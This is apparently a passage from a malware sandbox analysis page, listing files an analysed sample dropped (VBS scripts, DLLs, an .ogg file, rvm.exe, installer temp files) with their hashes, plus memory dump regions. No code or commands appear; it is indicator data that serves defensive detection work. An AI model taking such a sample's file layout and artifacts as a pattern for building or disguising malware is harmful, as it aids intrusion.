cb7294f1c425ad49aa0e487d36cfb580c303db25d1f69ea3fa08d81d29fc21ba

SHA512
0226c2662e4d6d2f473f075e8d200d55a3b18deacb40365450866039dafeb206ed6ea9216149d1ac5f1a19e8f185381b796d7f4fa3bb08c4558b6b292838e9c5

Download Submit
C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs

Filesize
698B

MD5
321dd6b21511298be116db48ff4c3a9f

SHA1
0fdf866e49eedb7a9c8e71d616c560f198cdc609

SHA256
aa95e6d593ce7a954a219274156a0c374e03aa646e079b35a14413220c71bb6c

SHA512
46b73a18f150556c920b1c4ae633d6c4beba2e5738c513b41015ee1aba050457d52b037fd323a5d420e0d9318936780df33a0f12dd31a58634aed4a96d987867

Download Submit
C:\Program Files (x86)\sev\dev\updt\task.vbs

Filesize
2KB

MD5
ff723ff7c810304303356d288fdc4031

SHA1
ad448f60e672afef99549e3ed8e4d6562d091693

SHA256
5aaf2026c1ec1fe938ce306fae543ac8d501c6acd716f6dd0ed9209976146252

SHA512
8252891df25b549a990350ded75c777e978291530fadf636e281c06a8b3fb9f477d93a764cea20c37c24b8a1ff5f2a0e46858cf46912c5e3f85909ce18279160

Download Submit
C:\Users\Admin\AppData\Local\All\ez\Package\capercailzie.ogg

Filesize
716KB

MD5
8dadb311228a45965b0f1ec27a094fc3

SHA1
1d28eb5b0b10afc93dd4bc559b03ec5a5b8bc2e7

SHA256
91c6e0a902676fc4f4a193404eaf347456b42420d1240a7a7132bb61ec05f9fe

SHA512
5a2bc5b4a573392c0b2ceaa8bac8fe5a2d69a653cb9088b8688e979e1d0396787dc85e561e33bf6ee13ffe2169450f0ec770f980878f22bb3858fe15392a16a8

Download Submit
C:\Users\Admin\AppData\Local\All\ez\Package\glib-2.0.dll

Filesize
1.0MB

MD5
a13b8a5f6deeea338470076abc37bd5c

SHA1
fdbbf4e920366f8f18e027e83a4a8891361749d8

SHA256
594e11fd0e79ce62ab6f9bc5f55fefea77263cd4db47022290dde20d34f9b3a5

SHA512
cd8584fddad25b392493f0edccf1cad475c6d1a0529d506de07629a94350f1aea5eee79eab5adc3e1b8da325c2277a81bfab3d69dccdb48399e1ea07c0a6a243

Download Submit
C:\Users\Admin\AppData\Local\All\ez\Package\vmtools.dll

Filesize
617KB

MD5
65c3c2a741838474a592679cda346753

SHA1
043d80766dd4e49d8dca6ac72b04e09b5491fdc9

SHA256
4e5f2c54d9ecfe48999edfcce0de038948f8b20ff68e299c55d9a2d6f65713e8

SHA512
e5d8b308586ffa914f46b6766217eb12ad759853d25108db06170b870d0e8947e2befabc2843f76cb864b0f0135a8f2163b7c93fe644b293789919d1d07c4079

Download Submit
C:\Users\Admin\AppData\Local\All\ez\ez\capercailzie.ogg

Filesize
946KB

MD5
411b0e96ff55e6b19bc5c9fb7ad942f7

SHA1
af11372ea875ef26e81e2fbf62e1f9d6c8c197a9

SHA256
beaa064b05ec8b67789f83128dd372824f4931557af9990fcba82e78495f270d

SHA512
8895b9ec1aa8c1ec4d6809fcf10abb70e4b41cefdb1765c19251d1ce7c2eb87230304e1420a72b4ea5d806418a83851fbcc93f7c18841ff3b0724c84ba9cac7d

Download Submit
C:\Users\Admin\AppData\Local\All\ez\ez\glib-2.0.dll

Filesize
1.0MB

MD5
448a76d7170127d1951ce9b55bf336b6

SHA1
57368e5dd3de0bc50acee8bc51801652483b2e6d

SHA256
7b3db5d740d9393ffd28d27dcf404a97f110bdba5a38efd5f9a762c2c54b18be

SHA512
da63dc8bc126b579c3af558cb8802e85445c84c7d2e9b6887c4ae13a631f1a0596e28cdf60231461bd64c8e2cf59f5c977d11ccb3128c6347213004d7b8ba4a4

Download Submit
C:\Users\Admin\AppData\Local\All\ez\ez\iconv.dll

Filesize
1.1MB

MD5
862dfc9bf209a46d6f4874614a6631cc

SHA1
43216aae64df217cba009145b6f9ad5b97fe927a

SHA256
84538f1aacebf9daad9fdb856611ab3d98a6d71c9ec79a8250eee694d2652a8b

SHA512
b0611cd9ad441871cca62291913197257660390fa4ea8a26cb41dc343a8a27ae111762de40c6f50cae3e365d8891500fc6ad0571aa3cd3a77eb83d9d488d19a8

Download Submit
C:\Users\Admin\AppData\Local\All\ez\ez\intl.dll

Filesize
87KB

MD5
d1a21e38593fddba8e51ed6bf7acf404

SHA1
759f16325f0920933ac977909b7fe261e0e129e6

SHA256
6a64c9cb0904ed48ce0d5cda137fcfd6dd463d84681436ca647b195aa2038a7e

SHA512
3f4390603cd68d949eb938c1599503fb1cbb1b8250638e0985fad2f40f08d5e45ea4a8c149e44a50c6aa9077054387c48f71b53bf06b713ca1e73a3d5a6a6c2e

Download Submit
C:\Users\Admin\AppData\Local\All\ez\ez\rvm.exe

Filesize
31KB

MD5
67dedab5bc0159f7cc61cb4b46daa6f1

SHA1
5d57ef4bd9b6ac672c413c5e8495263672f090e3

SHA256
0e6f5eaa2cd91747213f6aec05e3de6fb46ea2b7cf4d5f3ac267128abc784d00

SHA512
4c7ed5d6e0a76ac6eec79e50ae9cd4b5fe3eacda574606e47d85bba1739902d688aa6f5ec03e7863ec9d36bdadf6229f64bce8fe33bacf38e84e50332a30caf0

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI7a0a5.LOG

Filesize
48KB

MD5
92cf48faeeb494456226e4e3bfeaf8b4

SHA1
a48000266ca34dc39a24b0827c5c58c3c1fd821b

SHA256
babb9d342076f6d2f57fa4067530e6b0786167dccf96c722a71055ffd788e71d

SHA512
bfc8814a1b93ea5a71941f79eaa43b7500c957196f63b909954cf0a6e96dcaa71ffa8f224414b911cdaef5f744a4d5fd3dd576428736a517c5f936003c25d16f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ebzqevsf.yls.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Installer\MSIA345.tmp

Filesize
557KB

MD5
2c9c51ac508570303c6d46c0571ea3a1

SHA1
e3e0fe08fa11a43c8bca533f212bdf0704c726d5

SHA256
ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

SHA512
df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

Download Submit
C:\Windows\Installer\MSIA655.tmp

Filesize
1.1MB

MD5
7768d9d4634bf3dc159cebb6f3ea4718

SHA1
a297e0e4dd61ee8f5e88916af1ee6596cd216f26

SHA256
745de246181eb58f48224e6433c810ffbaa67fba330c616f03a7361fb1edb121

SHA512
985bbf38667609f6a422a22af34d9382ae4112e7995f87b6053a683a0aaa647e17ba70a7a83b5e1309f201fc12a53db3c13ffd2b0fad44c1374fff6f07059cbf

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Filesize
156KB

MD5
ea7c25dd9b546953669de1650948c631

SHA1
8cbd89e836556ab9dc79b43725ecbfa63d14250e

SHA256
88f510b9171f4ada72605309e6e948ad4ee2782d82d7567d5368cb0a56f163df

SHA512
d3bdc50da602c7f0201f6d2aeeba2b1b8002605bcb4276a0ffc46deaeb8581a8261ae28eda20e1f075124a63514d44c8a784b84bb85ef6f165a36ca780c8c06a

Download Submit
memory/744-173-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/856-51-0x000001F76C720000-0x000001F76C742000-memory.dmp

Filesize
136KB

Download
memory/1460-168-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/1460-166-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/1460-165-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/1680-191-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/1680-189-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/3608-126-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/3608-130-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/3672-172-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/3672-174-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/3672-184-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/3860-127-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/3860-128-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/4028-169-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/4028-158-0x0000000073940000-0x0000000073ABB000-memory.dmp

Filesize
1.5MB

Download
memory/4028-167-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/4548-188-0x00007FFE21530000-0x00007FFE21725000-memory.dmp

Filesize
2.0MB

Download
memory/4548-190-0x0000000001000000-0x0000000001042000-memory.dmp

Filesize
264KB

Download
memory/4548-195-0x0000000001000000-0x0000000001042000-memory.dmp

Filesize
264KB

Download